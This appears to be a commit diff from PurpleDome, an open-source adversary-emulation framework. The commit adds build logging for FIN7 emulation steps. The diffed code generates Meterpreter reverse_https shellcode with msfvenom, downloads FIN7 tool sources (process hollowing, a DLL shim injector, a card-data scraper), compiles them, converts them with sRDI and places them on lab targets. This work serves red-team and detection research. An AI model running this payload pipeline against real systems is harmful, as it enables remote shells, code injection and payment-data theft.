archive
/
PurpleDome
mirror of https://github.com/avast/PurpleDome
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Added tool building step to human readable log

Browse Source
pull/11/head
Thorsten Sick 3 years ago
parent 474a2ea185
commit 771b4bc5e2
5 changed files with 259 additions and 72 deletions
Show Stats Download Patch File Download Diff File

57
app/attack_log.py
Unescape Escape View File

@ -344,6 +344,63 @@ class AttackLog():
self.__add_to_log__(data)
return logid
def start_build(self, **kwargs):
""" Mark the start of a tool building/compilation process
@param source: source of the attack. Attack IP
@param target: Target machine of the attack
@param attack_name: Name of the attack. From plugin
@param ttp: TTP of the attack. From plugin
"""
timestamp = self.__get_timestamp__()
logid = timestamp + "_" + str(randint(1, 100000))
data = {"timestamp": timestamp,
"timestamp_end": None,
"event": "start",
"type": "build",
# "sub_type": "",
"logid": logid,
"dl_uri": kwargs.get("dl_uri", None),
"dl_uris": kwargs.get("dl_uris", None),
"payload": kwargs.get("payload", None),
"platform": kwargs.get("platform", None),
"architecture": kwargs.get("architecture", None),
"lhost": kwargs.get("lhost", None),
"lport": kwargs.get("lport", None),
"filename": kwargs.get("filename", None),
"encoding": kwargs.get("encoding", None),
"encoded_filename": kwargs.get("encoded_filename", None),
"sRDI_conversion": kwargs.get("sRDI_conversion", False),
"for_step": kwargs.get("for_step", None),
"comment": kwargs.get("comment", None),
}
self.__add_to_log__(data)
return logid
# TODO: Add parameter
# TODO: Add config
# TODO: Add results
def stop_build(self, **kwargs):
""" Mark the end of a tool building/compilation process
@param source: source of the attack. Attack IP
@param target: Target machine of the attack
@param attack_name: Name of the attack. From plugin
@param ttp: TTP of the attack. From plugin
"""
data = {"timestamp": self.__get_timestamp__(),
"event": "stop",
"type": "build",
# "sub_type": "",
"logid": kwargs.get("logid", None)
}
self.__add_to_log__(data)
def start_metasploit_attack(self, source, target, metasploit_command, ttp=None, **kwargs):
""" Mark the start of a Metasploit based attack

1
app/experimentcontrol.py
Unescape Escape View File

@ -183,6 +183,7 @@ class Experiment():
target_1.halt()
self.__stop_attacker()
self.attack_logger.post_process()
self.attack_logger.write_json(os.path.join(self.lootdir, "attack.json"))
self.zip_loot(zip_this)

7
doc_generator.py
Unescape Escape View File

@ -31,8 +31,11 @@ if __name__ == "__main__":
# generate("loot/2021_07_19___16_28_45/attack.json", "tools/human_readable_documentation/contents.rst") # Working example for a short run
# generate("loot/2021_07_20___08_26_33/attack.json", "tools/human_readable_documentation/contents.rst") # FIN 7 #1
# generate("loot/2021_07_20___10_07_36/attack.json", "tools/human_readable_documentation/contents.rst") # FIN 7 #2 The one Fabrizio got
generate("loot/2021_07_28___12_09_00/attack.json",
"tools/human_readable_documentation/contents.rst") # FIN 7 The last minute locally generated thing
#generate("loot/2021_07_28___12_09_00/attack.json",
# "tools/human_readable_documentation/contents.rst") # FIN 7 The last minute locally generated thing
generate("loot/2021_08_30___14_40_23/attack.json",
"tools/human_readable_documentation/contents.rst") # FIN 7 With genereated files added
# generate("loot/2021_07_19___15_10_45/attack.json", "tools/human_readable_documentation/contents.rst")
# generate("removeme.json", "tools/human_readable_documentation/contents.rst")

201
plugins/default/adversary_emulations/FIN7/fin7_section1.py
Unescape Escape View File

@ -178,12 +178,39 @@ In this simulation sql-rat.js communication will be replaced by Caldera communic
# Generate shellcode
# msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.0.4 LPORT=443 EXITFUNC=thread -f C --encrypt xor --encrypt-key m
dl_uri = "https://raw.githubusercontent.com/center-for-threat-informed-defense/adversary_emulation_library/master/fin7/Resources/Step4/babymetal/babymetal.cpp"
architecture = "x64"
target_platform = "windows"
payload = self.payload_type_1
lhost = self.attacker_machine_plugin.get_ip()
lport = "443"
filename = "babymetal.dll"
encoding = "base64"
encoded_filename = "babymetal_encoded.txt"
sRDI_conversion = True
for_step = 4
logid = self.attack_logger.start_build(dl_uri=dl_uri,
architecture=architecture,
target_platform=target_platform,
payload=payload,
lhost=lhost,
lport=lport,
filename=filename,
encoding=encoding,
encoded_filename=encoded_filename,
sRDI_conversion=sRDI_conversion,
for_step=for_step,
comment="This is the stager uploaded to the target and executed to get the first Meterpreter shell on the target network.")
venom = MSFVenom(self.attacker_machine_plugin, hotelmanager, self.attack_logger)
venom.generate_payload(payload=self.payload_type_1,
architecture="x64",
platform="windows",
lhost=self.attacker_machine_plugin.get_ip(),
lport="443",
venom.generate_payload(payload=payload,
architecture=architecture,
platform=target_platform,
lhost=lhost,
lport=lport,
exitfunc="thread",
format="c",
encrypt="xor",
@ -194,7 +221,7 @@ In this simulation sql-rat.js communication will be replaced by Caldera communic
# get C source
self.attacker_machine_plugin.remote_run(
"cd tool_factory/step_4; rm babymetal.cpp; wget https://raw.githubusercontent.com/center-for-threat-informed-defense/adversary_emulation_library/master/fin7/Resources/Step4/babymetal/babymetal.cpp")
f"cd tool_factory/step_4; rm babymetal.cpp; wget {dl_uri}")
# paste shellcode into C source
self.attacker_machine_plugin.remote_run(
@ -203,13 +230,15 @@ In this simulation sql-rat.js communication will be replaced by Caldera communic
# Compile to DLL
self.attacker_machine_plugin.remote_run("cd tool_factory/step_4; sed -i 's/#include <Windows.h>/#include <windows.h>/g' babymetal_patched.cpp")
self.attacker_machine_plugin.remote_run(
"cd tool_factory/step_4;x86_64-w64-mingw32-g++ -shared babymetal_patched.cpp -o babymetal.dll")
f"cd tool_factory/step_4;x86_64-w64-mingw32-g++ -shared babymetal_patched.cpp -o {filename}")
# sRDI conversion
self.attacker_machine_plugin.remote_run("cd tool_factory/; python3 sRDI/Python/ConvertToShellcode.py -f BabyMetal step_4/babymetal.dll")
self.attacker_machine_plugin.remote_run(f"cd tool_factory/; python3 sRDI/Python/ConvertToShellcode.py -f BabyMetal step_4/{filename}")
# base64 conversion
self.attacker_machine_plugin.remote_run("cd tool_factory/step_4; base64 babymetal.bin > babymetal_encoded.txt")
self.attacker_machine_plugin.remote_run(f"cd tool_factory/step_4; base64 babymetal.bin > {encoded_filename}")
self.attack_logger.stop_build(logid = logid)
self.attack_logger.vprint(
f"{CommandlineColors.OKGREEN}Step 4 compiling tools{CommandlineColors.ENDC}", 1)
@ -381,14 +410,33 @@ In the original attack Babymetal payload is a dll. Currently we are using a simp
# --encrypt xor : xor encrypt the results
# --encrypt-key m : the encryption key
dl_uri = "https://raw.githubusercontent.com/center-for-threat-informed-defense/adversary_emulation_library/master/fin7/Resources/Step6/Hollow/ProcessHollowing.c"
payload = self.payload_type_1
architecture = "x64"
target_platform = "windows"
lhost = self.attacker_machine_plugin.get_ip()
lport = "443"
filename = "hollow.exe"
for_step = 6
logid = self.attack_logger.start_build(dl_uri=dl_uri,
architecture=architecture,
target_platform=target_platform,
payload=payload,
lhost=lhost,
lport=lport,
filename=filename,
for_step=for_step,
comment="This will be copied using paexec to the it admin host. It will spawn svchost.exe there and create a first Meterpreter shell on this PC.")
# Generate shellcode
# msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.0.4 LPORT=443 -f exe -o msf.exe
venom = MSFVenom(self.attacker_machine_plugin, hotelmanager, self.attack_logger)
venom.generate_payload(payload=self.payload_type_1,
architecture="x64",
platform="windows",
lhost=self.attacker_machine_plugin.get_ip(),
lport="443",
venom.generate_payload(payload=payload,
architecture=architecture,
platform=target_platform,
lhost=lhost,
lport=lport,
format="exe",
outfile="msf.executable")
@ -399,7 +447,7 @@ In the original attack Babymetal payload is a dll. Currently we are using a simp
# Get ProcessHollowing.c
self.attacker_machine_plugin.remote_run(
"cd tool_factory/step_6; rm ProcessHollowing.c; wget https://raw.githubusercontent.com/center-for-threat-informed-defense/adversary_emulation_library/master/fin7/Resources/Step6/Hollow/ProcessHollowing.c")
f"cd tool_factory/step_6; rm ProcessHollowing.c; wget {dl_uri}")
self.attacker_machine_plugin.remote_run(
"cd tool_factory/step_6; sed -i 's/#include <Windows.h>/#include <windows.h>/g' ProcessHollowing.c")
@ -414,7 +462,9 @@ In the original attack Babymetal payload is a dll. Currently we are using a simp
# Compiled for 64 bit.
self.attacker_machine_plugin.remote_run("cd tool_factory/step_6; rm hollow.exe;")
self.attacker_machine_plugin.remote_run("cd tool_factory/step_6; x86_64-w64-mingw32-gcc -municode -D UNICODE -D _UNICODE ProcessHollowing.c -L/usr/x86_64-w64-mingw32/lib/ -l:libntdll.a -o hollow.exe")
self.attacker_machine_plugin.remote_run(f"cd tool_factory/step_6; x86_64-w64-mingw32-gcc -municode -D UNICODE -D _UNICODE ProcessHollowing.c -L/usr/x86_64-w64-mingw32/lib/ -l:libntdll.a -o {filename}")
self.attack_logger.stop_build(logid=logid)
self.attack_logger.vprint(
f"{CommandlineColors.OKGREEN}Step 6 compiling tools{CommandlineColors.ENDC}", 1)
@ -555,13 +605,34 @@ NOT IMPLEMENTED YET. MAYBE DO THIS PARTIAL. KEYLOGGING NEEDS USER INTERACTION.
accounting = self.get_target_by_name("accounting")
self.attacker_machine_plugin.remote_run("mkdir tool_factory/step_9")
payload = "windows/meterpreter/reverse_https"
filename = "dll329.dll"
for_step = 9
architecture = "x86"
target_platform = "windows"
lhost = self.attacker_machine_plugin.get_ip()
lport = "53"
sRDI_conversion = True
encoded_filename = "bin329.tmp"
logid = self.attack_logger.start_build(architecture=architecture,
target_platform=target_platform,
payload=payload,
lhost=lhost,
lport=lport,
filename=filename,
for_step=for_step,
sRDI_conversion= sRDI_conversion,
encoded_filename=encoded_filename,
comment="And SRDI converted Meterpreter shell. Will be stored in the registry.")
# msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_https LHOST=192.168.0.4 LPORT=53 -f dll -o payload.dll
venom = MSFVenom(self.attacker_machine_plugin, accounting, self.attack_logger)
venom.generate_payload(payload="windows/meterpreter/reverse_https",
architecture="x86",
platform="windows",
lhost=self.attacker_machine_plugin.get_ip(),
lport="53",
venom.generate_payload(payload=payload,
architecture=architecture,
platform=target_platform,
lhost=lhost,
lport=lport,
format="dll",
outfile="payload.dll")
@ -570,29 +641,50 @@ NOT IMPLEMENTED YET. MAYBE DO THIS PARTIAL. KEYLOGGING NEEDS USER INTERACTION.
self.attacker_machine_plugin.remote_run("cd tool_factory/; python3 sRDI/Python/ConvertToShellcode.py step_9/payload.dll")
# mv payload.bin bin329.tmp
self.attacker_machine_plugin.remote_run("cp tool_factory/step_9/payload.bin tool_factory/step_9/bin329.tmp")
self.attacker_machine_plugin.remote_run(f"cp tool_factory/step_9/payload.bin tool_factory/step_9/{encoded_filename}")
# This will be stored in the registry
self.attack_logger.stop_build(logid=logid)
# ## DLL 329
# Build https://github.com/center-for-threat-informed-defense/adversary_emulation_library/tree/master/fin7/Resources/Step9/InjectDLL-Shim
dl_uris = ["https://raw.githubusercontent.com/center-for-threat-informed-defense/adversary_emulation_library/master/fin7/Resources/Step9/InjectDLL-Shim/dllmain.cpp",
"https://raw.githubusercontent.com/center-for-threat-informed-defense/adversary_emulation_library/master/fin7/Resources/Step9/InjectDLL-Shim/pe.cpp",
"https://raw.githubusercontent.com/center-for-threat-informed-defense/adversary_emulation_library/master/fin7/Resources/Step9/InjectDLL-Shim/pe.h"]
filename = "dll329.dll"
for_step = 9
logid = self.attack_logger.start_build(dl_uris=dl_uris,
filename=filename,
for_step=for_step,
comment="Will be injected into the AccoutingIQ executable.")
self.attacker_machine_plugin.remote_run(
"cd tool_factory/step_9; rm dllmain.cpp")
self.attacker_machine_plugin.remote_run("cd tool_factory/step_9; wget https://raw.githubusercontent.com/center-for-threat-informed-defense/adversary_emulation_library/master/fin7/Resources/Step9/InjectDLL-Shim/dllmain.cpp")
self.attacker_machine_plugin.remote_run(f"cd tool_factory/step_9; wget {dl_uris[0]}")
self.attacker_machine_plugin.remote_run("cd tool_factory/step_9; rm pe.cpp;")
self.attacker_machine_plugin.remote_run("cd tool_factory/step_9; wget https://raw.githubusercontent.com/center-for-threat-informed-defense/adversary_emulation_library/master/fin7/Resources/Step9/InjectDLL-Shim/pe.cpp")
self.attacker_machine_plugin.remote_run(f"cd tool_factory/step_9; wget {dl_uris[1]}")
self.attacker_machine_plugin.remote_run("cd tool_factory/step_9; rm pe.h;")
self.attacker_machine_plugin.remote_run("cd tool_factory/step_9; wget https://raw.githubusercontent.com/center-for-threat-informed-defense/adversary_emulation_library/master/fin7/Resources/Step9/InjectDLL-Shim/pe.h")
self.attacker_machine_plugin.remote_run(f"cd tool_factory/step_9; wget {dl_uris[2]}")
# Compiling dll 329
self.attacker_machine_plugin.remote_run("cd tool_factory/step_9; rm dll329.dll;")
self.attacker_machine_plugin.remote_run("cd tool_factory/step_9; i686-w64-mingw32-g++ -m32 -shared -municode -D UNICODE -D _UNICODE -fpermissive dllmain.cpp pe.cpp -L/usr/i686-w64-mingw32/lib/ -l:libntoskrnl.a -l:libntdll.a -o dll329.dll")
self.attacker_machine_plugin.remote_run(f"cd tool_factory/step_9; rm {filename};")
self.attacker_machine_plugin.remote_run(f"cd tool_factory/step_9; i686-w64-mingw32-g++ -m32 -shared -municode -D UNICODE -D _UNICODE -fpermissive dllmain.cpp pe.cpp -L/usr/i686-w64-mingw32/lib/ -l:libntoskrnl.a -l:libntdll.a -o {filename}")
self.attack_logger.stop_build(logid=logid)
# ## sdbE376.tmp
dl_uri = "https://github.com/center-for-threat-informed-defense/adversary_emulation_library/raw/master/fin7/Resources/Step9/sdbE376.tmp"
filename = "sdbE376.tmp"
logid = self.attack_logger.start_build(dl_uri=dl_uri,
filename=filename,
for_step=9,
comment="An SDB Shim database file. Will be installed for application shimming.")
# Just download https://github.com/center-for-threat-informed-defense/adversary_emulation_library/raw/master/fin7/Resources/Step9/sdbE376.tmp
self.attacker_machine_plugin.remote_run("cd tool_factory/step_9; rm sdbE376.tmp")
self.attacker_machine_plugin.remote_run("cd tool_factory/step_9; wget https://github.com/center-for-threat-informed-defense/adversary_emulation_library/raw/master/fin7/Resources/Step9/sdbE376.tmp")
self.attacker_machine_plugin.remote_run(f"cd tool_factory/step_9; rm {filename}")
self.attacker_machine_plugin.remote_run(f"cd tool_factory/step_9; wget {dl_uri}")
self.attack_logger.stop_build(logid=logid)
self.attack_logger.vprint(f"{CommandlineColors.OKGREEN}Step 9 compiling tools{CommandlineColors.ENDC}", 1)
@ -627,6 +719,8 @@ NOT IMPLEMENTED YET
self.attack_logger.vprint(
f"{CommandlineColors.OKBLUE}Step 10 compiling tools{CommandlineColors.ENDC}", 1)
accounting = self.get_target_by_name("accounting")
# Compiling
# i686-w64-mingw32-gcc is for 32 bit
@ -634,33 +728,50 @@ NOT IMPLEMENTED YET
# Important: pillowMint is not very complex and looks for the data at a fixed address. As we a re-compiling AccountIQ.exe and the data address does not match the expected one we will just get garbage.
filename = "AccountingIQ.exe"
dl_uri = "https://raw.githubusercontent.com/center-for-threat-informed-defense/adversary_emulation_library/master/fin7/Resources/Step10/AccountingIQ.c"
logid = self.attack_logger.start_build(
filename=filename,
for_step=10,
dl_uri=dl_uri,
comment="This is a simulated credit card tool to target. The final flag is in here.")
# simulated credit card tool as target
self.attacker_machine_plugin.remote_run("mkdir tool_factory/step_10") # MSFVenom needs to be installed
self.attacker_machine_plugin.remote_run("cd tool_factory/step_10; rm AccountingIQ.exe")
self.attacker_machine_plugin.remote_run(f"cd tool_factory/step_10; rm {filename}")
self.attacker_machine_plugin.remote_run(
"cd tool_factory/step_10; rm AccountingIQ.c; wget https://raw.githubusercontent.com/center-for-threat-informed-defense/adversary_emulation_library/master/fin7/Resources/Step10/AccountingIQ.c")
"cd tool_factory/step_10; rm AccountingIQ.c; wget {dl_uri}")
self.attacker_machine_plugin.remote_run(
"cd tool_factory/step_10; i686-w64-mingw32-gcc -m32 -L/usr/i686-w64-mingw32/lib -I/usr/i686-w64-mingw32/include AccountingIQ.c -o AccountingIQ.exe")
f"cd tool_factory/step_10; i686-w64-mingw32-gcc -m32 -L/usr/i686-w64-mingw32/lib -I/usr/i686-w64-mingw32/include AccountingIQ.c -o {filename}")
self.attacker_machine_plugin.get("tool_factory/step_10/AccountingIQ.exe",
self.attacker_machine_plugin.get(f"tool_factory/step_10/{filename}",
os.path.join(os.path.dirname(self.plugin_path), "resources", "step10",
"AccountingIQ.exe"))
filename))
accounting.put(os.path.join(os.path.dirname(self.plugin_path), "resources", "step10", filename),
filename)
self.attack_logger.stop_build(logid=logid)
# Simulated credit card scraper
self.attacker_machine_plugin.remote_run("cd tool_factory/step_10; rm pillowMint.exe")
filename = "pillowMint.exe"
dl_uri = "https://raw.githubusercontent.com/center-for-threat-informed-defense/adversary_emulation_library/master/fin7/Resources/Step10/pillowMint.cpp"
logid = self.attack_logger.start_build(
filename=filename,
for_step=10,
dl_uri=dl_uri,
comment="This is a simulated credit card data scraper.")
self.attacker_machine_plugin.remote_run(f"cd tool_factory/step_10; rm {filename}")
self.attacker_machine_plugin.remote_run(
"cd tool_factory/step_10; rm pillowMint.cpp; wget https://raw.githubusercontent.com/center-for-threat-informed-defense/adversary_emulation_library/master/fin7/Resources/Step10/pillowMint.cpp")
f"cd tool_factory/step_10; rm pillowMint.cpp; wget {dl_uri}")
self.attacker_machine_plugin.remote_run(
"cd tool_factory/step_10; x86_64-w64-mingw32-g++ -static pillowMint.cpp -o pillowMint.exe")
self.attacker_machine_plugin.get("tool_factory/step_10/pillowMint.exe",
f"cd tool_factory/step_10; x86_64-w64-mingw32-g++ -static pillowMint.cpp -o {filename}")
self.attacker_machine_plugin.get(f"tool_factory/step_10/{filename}",
os.path.join(os.path.dirname(self.plugin_path), "resources", "step10",
"pillowMint.exe"))
filename))
accounting = self.get_target_by_name("accounting")
accounting.put(os.path.join(os.path.dirname(self.plugin_path), "resources", "step10", "pillowMint.exe"),
"pillowMint.exe")
accounting.put(os.path.join(os.path.dirname(self.plugin_path), "resources", "step10", "AccountingIQ.exe"),
"AccountingIQ.exe")
accounting.put(os.path.join(os.path.dirname(self.plugin_path), "resources", "step10", filename),
filename)
self.attack_logger.stop_build(logid=logid)
self.attack_logger.vprint(
f"{CommandlineColors.OKGREEN}Step 10 compiling tools{CommandlineColors.ENDC}", 1)
@ -725,7 +836,7 @@ NOT IMPLEMENTED YET. NEEDS TARGET REBOOTING: NO IDEA IF ATTACKX CAN SUPPORT THAT
# Those build calls will be called from the steps directly. But it is always conveniet for testing to use that now directly while developing
# Building the tools is temporarily de-activated. Without the proper environment the tools being built are useless. Many attacks run on temporary attacks
if False:
if True:
self.build_step4() # DONE
self.build_step6() # DONE
# TODO: self.build_step7() # Will not be done until the environment is planned. This step needs Aloha Command Center on the target. Maybe we write our own vulnerable app....

65
templates/attack_description.rst
Unescape Escape View File

@ -6,100 +6,115 @@ Target systems
Attack steps
------------
{% for e in events %}
{% if e.event is eq("start") %}
{% if e.type is eq("dropping_file") %}
Dropping file to target
~~~~~~~~~~~~~~~~~~~~~~~
At {{ e.timestamp }}
The file {{ e.file_name }} is dropped to the target {{ e.target }}.
{% endif %}
{% if e.type is eq("execute_payload") %}
Executing payload on target
~~~~~~~~~~~~~~~~~~~~~~~~~~~
At {{ e.timestamp }}
The command {{ e.command }} is used to start a file on the target {{ e.target }}.
{% endif %}
{% if e.type is eq("narration") %}
{{ e.text }}
{% endif %}
{% if e.sub_type is eq("metasploit") %}
Metasploit attack {{ e.name }}
~~~~~~~~~~~~~~~~~~~~~~~~~~
Tactics: {{ e.tactics }}
Tactics ID: {{ e.tactics_id }}
Hunting Tag: {{ e.hunting_tag}}
At {{ e.timestamp }} a Metasploit command {{ e.name }} was used to attack {{ e.target }} from {{ e.source }}.
{{ e.description }}
{% if e.metasploit_command is string() %}
Metasploit command: {{ e.metasploit_command }}
{% endif %}
{% if e.situation_description is string() %}
Situation: {{ e.situation_description }}
{% endif %}
{% if e.countermeasure is string() %}
Countermeasure: {{ e.countermeasure }}
{% endif %}
{% endif %}
{% if e.sub_type is eq("kali") %}
Kali attack {{ e.name }}
~~~~~~~~~~~~~~~~~~~~~~~~~~
Tactics: {{ e.tactics }}
Tactics ID: {{ e.tactics_id }}
Hunting Tag: {{ e.hunting_tag}}
At {{ e.timestamp }} a Kali command {{ e.kali_name }} was used to attack {{ e.target }} from {{ e.source }}.
{{ e.description }}
{% if e.kali_command is string() %}
Kali command: {{ e.kali_command }}
{% endif %}
{% if e.situation_description is string() %}
Situation: {{ e.situation_description }}
{% endif %}
{% if e.countermeasure is string() %}
Countermeasure: {{ e.countermeasure }}
{% endif %}
{% endif %}
{% if e.sub_type is eq("caldera") %}
Caldera attack {{ e.name }}
~~~~~~~~~~~~~~~~~~~~~~~~~~
Tactics: {{ e.tactics }}
Tactics ID: {{ e.tactics_id }}
Hunting Tag: {{ e.hunting_tag}}
At {{ e.timestamp }} a Caldera ability {{ e.ability_id }}/"{{ e.name }}" was used to attack the group {{ e.target_group }} from {{ e.source }}.
{{ e.description }}
{% if e.situation_description is string() %}
Situation: {{ e.situation_description }}
{% endif %}
{% if e.countermeasure is string() %}
Countermeasure: {{ e.countermeasure }}
{% endif %}
{% endif %}
{% endif %} {# event equal start #}
{% endfor %}
Tools
-----
{% for e in events %}
{% if e.event is eq("start") %}
{% if e.type is eq("build") %}
Building tool {{ e.filename }}
~~~~~~~~~~~~~~~~~~~~~~~
The file {{ e.filename }} is built
{% if e.for_step %}
It will be used in Step {{ e.for_step }}
{% endif %}
Build time is between {{ e.timestamp }} and {{ e.timestamp_end }}
{% if e.dl_uri is string() %}
Built from source downloaded from {{ e.dl_uri }}
{% endif %}
{% if e.dl_uris %}
Built from sources downloaded from
{% for i in e.dl_uris %}
* {{ i }}
{% endfor %}
{% endif %}
{% if e.payload is string() %}
The attack tool uses a Meterpreter payload. The payload is {{ e.payload }}. The payload is built for the {{ e.platform }} platform and the {{ e.architecture }} architecture.
The settings for lhost and lport are {{ e.lhost }}/{{ e.lport }}.
{% endif %}
{% if e.encoding is string() %}
The file was encoded using {{ e.encoding }} after compilation.
{% endif %}
{% if e.encoded_filename is string() %}
The encoded version is named {{ e.encoded_filename }}.
{% endif %}
{% if e.SRDI_conversion %}
The attack tool was converted to position independent shellcode. See: https://github.com/monoxgas/sRDI
{% endif %}
{{ e.comment }}
{% endif %}
{% endif %}
{% endfor %}
{% endif %} {# event equal start #}
{% endfor %}
Write Preview
Loading…
Cancel
Save